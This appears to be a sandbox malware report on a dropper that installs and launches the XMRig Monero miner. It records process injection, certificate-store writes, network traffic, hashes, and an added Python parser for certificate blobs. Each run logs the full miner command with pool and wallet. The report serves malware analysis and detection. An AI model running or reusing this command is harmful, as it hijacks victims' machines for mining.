Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value removed] C:\Users\Admin\AppData\Local\Temp\main.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value removed] C:\Users\Admin\AppData\Local\Temp\main.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 964 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 964 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1797s

Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1795s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1794s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240226-en

Max time kernel

1796s

Max time network

1810s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 152.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.212.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1948-16-0x000002D5FDA90000-0x000002D5FDAB0000-memory.dmp

memory/1948-17-0x000002D5FDAD0000-0x000002D5FDAF0000-memory.dmp

memory/1948-18-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-21-0x000002D5FDAF0000-0x000002D5FDB10000-memory.dmp

memory/1948-20-0x000002D5FDB10000-0x000002D5FDB30000-memory.dmp

memory/1948-19-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-22-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-23-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-25-0x000002D5FDAF0000-0x000002D5FDB10000-memory.dmp

memory/1948-24-0x000002D5FDB10000-0x000002D5FDB30000-memory.dmp

memory/1948-26-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-27-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-28-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-29-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-30-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-31-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-32-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-33-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-34-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-35-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-36-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-37-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-38-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-39-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-40-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-41-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-42-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-43-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-44-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-45-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-46-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-47-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-48-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-49-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-50-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-51-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-52-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-53-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-54-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-55-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-56-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-57-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-58-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-59-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-60-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-61-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-62-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-63-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-64-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-65-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-66-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-67-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-68-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-69-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-70-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-71-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-72-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-73-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-74-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-75-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-76-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-77-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-78-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-79-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-80-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-81-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-82-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-83-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-84-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8f
b142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
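The "Modifies system certificate store" hits in behavioral11 and behavioral15 are tagged evasion/spyware/trojan, but the entry is written under AuthRoot, the store that Windows' automatic root update fills with Microsoft-distributed third-party roots on first use, and the Blob value shown above decodes to the public Comodo/Sectigo "AAA Certificate Services" root (friendly name "Sectigo (AAA)", subject "Comodo CA Limited / AAA Certificate Services", valid 2004-01-01 to 2028-12-31; the key name D1EB23A46D17D68FD92564C2F1F1601764D8E349 is its SHA-1 thumbprint). That is consistent with the dropper's own TLS downloads triggering the root update in-process rather than with a planted root. The decoder below is an added example, not part of the sandbox report or of any Microsoft tool; it walks the Blob's property list (each property is DWORD propid, DWORD reserved = 1, DWORD length, data), pulls out the DER certificate, and checks that the key name, the cached SHA-1 property and the SHA-1 of the actual certificate bytes agree. The sample DER inside it is constructed so the code runs offline; for the real entry, pass the key name and the hex after "Blob =" (joined where the report wraps it).

```python
"""Decode a SystemCertificates\\...\\Certificates\\<thumbprint>\\Blob value.

Added example (not part of the sandbox report or of any vendor tool).
The Blob is a flat list of serialized certificate properties, each:
    DWORD propid | DWORD reserved (always 1) | DWORD length | data[length]
little-endian, with no outer header. The properties used here:
  0x03  CERT_SHA1_HASH_PROP_ID      cached SHA-1 thumbprint (also the key name)
  0x0B  CERT_FRIENDLY_NAME_PROP_ID  UTF-16LE display name
  0x20  CERT_CERT_PROP_ID           the DER-encoded certificate itself
"""
import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 0x03
CERT_FRIENDLY_NAME_PROP_ID = 0x0B
CERT_CERT_PROP_ID = 0x20


def parse_blob(blob: bytes) -> dict:
    """Walk the property list; return {propid: raw data}."""
    props = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated property header at offset {off}")
        propid, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed property 0x{propid:x} at offset {off - 12}")
        props[propid] = blob[off:off + length]
        off += length
    return props


def build_blob(props: dict) -> bytes:
    """Inverse of parse_blob; used here only to construct the offline sample."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data
                    for pid, data in props.items())


def check_cert_entry(key_thumbprint: str, blob_hex: str) -> dict:
    """Cross-check key name, cached thumbprint and the actual certificate bytes."""
    props = parse_blob(bytes.fromhex(blob_hex))
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("blob carries no certificate (propid 0x20)")
    actual = hashlib.sha1(der).hexdigest()
    cached = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le", "replace").rstrip("\0")
    return {
        "sha1_of_der": actual,
        "cached_sha1": cached,
        "friendly_name": name,
        "der_len": len(der),
        # all three must agree; a mismatch means the entry was not written by crypt32
        "consistent": actual == cached == key_thumbprint.lower(),
    }


# Constructed sample: a stand-in DER body (not a real certificate) wrapped the
# way Windows serializes a store entry, so the check runs without the report.
SAMPLE_DER = b"\x30\x82\x00\x14" + bytes(range(20))
SAMPLE_BLOB = build_blob({
    CERT_SHA1_HASH_PROP_ID: hashlib.sha1(SAMPLE_DER).digest(),
    CERT_FRIENDLY_NAME_PROP_ID: "Sample root\0".encode("utf-16-le"),
    CERT_CERT_PROP_ID: SAMPLE_DER,
})
SAMPLE_KEY = hashlib.sha1(SAMPLE_DER).hexdigest().upper()

if __name__ == "__main__":
    # For the real entry: check_cert_entry("D1EB23A4...E349", "<hex after Blob =>")
    print(check_cert_entry(SAMPLE_KEY, SAMPLE_BLOB.hex()))
```

If the three hashes agree and the DER's subject is a root you recognize, the signature is the root-update side effect; if the cached thumbprint or key name does not match the SHA-1 of the DER, or the DER is a root you do not recognize, treat the entry as attacker-written and pull the certificate out of the Blob for analysis.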

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
